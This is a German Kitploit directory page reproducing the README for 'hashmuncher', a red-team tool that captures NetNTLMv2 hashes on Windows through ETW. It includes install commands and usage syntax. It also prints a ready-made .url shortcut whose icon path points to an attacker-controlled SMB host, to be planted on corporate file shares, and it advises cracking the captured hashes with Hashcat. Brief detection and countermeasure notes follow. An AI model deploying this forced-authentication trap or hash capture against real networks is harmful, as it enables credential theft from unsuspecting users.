Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/lkarlslund/hashmuncher
Paket-Sniffing & AnalysePasswortangriffeHash-AnalyseInformationsbeschaffungPenetrationstestsRed Teaming
GitHublkarlslund/hashmuncher

hashmuncher

Erfassen Sie NetNTLMv2-Hashes mithilfe von ETW mit Administratorrechten unter Windows 8.1 / Windows Server 2016 und neuer

Repository anzeigen
12675vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Hash Muncher

Sammle NetNTLMv2-Hashes mithilfe von ETW mit Administratorrechten unter Windows

GitHub all releases GitHub Workflow Status

  • Erfordert erhöhten (Administrator-)Zugriff unter Windows 8.1 / Windows 2016 oder später
  • Verwendet die Ereignisablaufverfolgung für Windows (ETW), um Zugriff auf die Rohpaketdaten von SMB-Authentifizierungspaketen zu erhalten
  • Dekodiert NTLM-Nachrichtentypen 2 und 3
  • Gibt auf stdout oder in eine Datei aus
  • Drücken Sie Strg-C, um die Verarbeitung zu beenden, oder verwenden Sie die Timeout-Option
  • Knacken Sie Hashes mit HashCat unter Verwendung von -m 5600

Hash Muncher erhalten

Es gibt drei verschiedene Optionen, um das Tool einzurichten und auszuführen

A) Automatisch erstellte Binärdateien von releases herunterladen

B) Unter Windows mit diesem Go-Befehl erstellen und installieren

  • erfordert Golang
root@kitploit:~
go install github.com/lkarlslund/hashmuncher@latest

C) Die Windows-Binärdateien auf jeder von Golang unterstützten Plattform mit installiertem PowerShell cross-kompilieren

  • erfordert Golang und PowerShell
root@kitploit:~
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1

Verwendung

  1. Stellen Sie sicher, dass die Windows-Firewall „Datei- und Druckerfreigabe“ zulässt, da Hash Muncher den integrierten SMB-Dienst benötigt, um die anfängliche Anforderung zu senden und Antwortpakete an das Ziel zu senden.

  2. Führen Sie Hash Muncher in einer Eingabeaufforderung mit erhöhten Rechten aus

root@kitploit:~
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
  1. Warten Sie nun darauf, dass sich jemand an Ihrer Maschine authentifiziert, oder platzieren Sie eine URL-Verknüpfung in einer beliebten gemeinsamen Dateifreigabe wie unten gezeigt.
root@kitploit:~
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1

Ersetzen Sie die IP-Adresse durch Ihren Hach-Muncher-Rechner und speichern Sie die Datei als „whatever.url“ auf einer (unternehmensweiten) Dateifreigabe – und beobachten Sie, wie die Hashes hereinstromen.

Andere Methoden werden in den Red Team Notes – Forced Authentication erwähnt, und Sie können vermutlich auch Erfolg haben, indem Sie allen ein Word-Dokument mailen, aber das ist überhaupt nicht heimlich.

Erkennung

  • Keine, die ich gesehen habe, aber bitte hinterlassen Sie Feedback

Gegenmaßnahmen

  • Keine für den ETW-Teil; das ist laut Microsoft Teil des Windows-Designs.
  • Verwenden Sie STARKE Passwörter! Das Knacken von NetNTLMv2 ist überhaupt nicht schnell, aber mit schwachen Passwörtern ist es durchaus möglich.
  • Deaktivieren Sie NTLM vollständig! Es wird wahrscheinlich nicht schmerzfrei sein – aber siehe Auf Wiedersehen, NTLM – Es ist Zeit, NTLM zu deaktivieren

Verlauf

Ich habe mich immer wieder mit ETW beschäftigt, aber als ich die sehr coole Forschung von Nettitude Labs sah, wusste ich, dass ich daraus ein einfach zu bedienendes Tool in meiner Lieblingssprache Golang machen musste! Nettitude Labs hat einen funktionierenden POC, der in C# geschrieben ist und unter dem .Net-Framework läuft, und das könnte eine bessere Option für Sie sein. Ich erfinde hier also nicht wirklich etwas Neues, sondern füge lediglich eine Alternative hinzu.

Wenn Sie Windows-Sicherheit mögen, gefällt Ihnen vielleicht auch mein Angriffsgraphen-Tool Adalanche

Tool herunterladen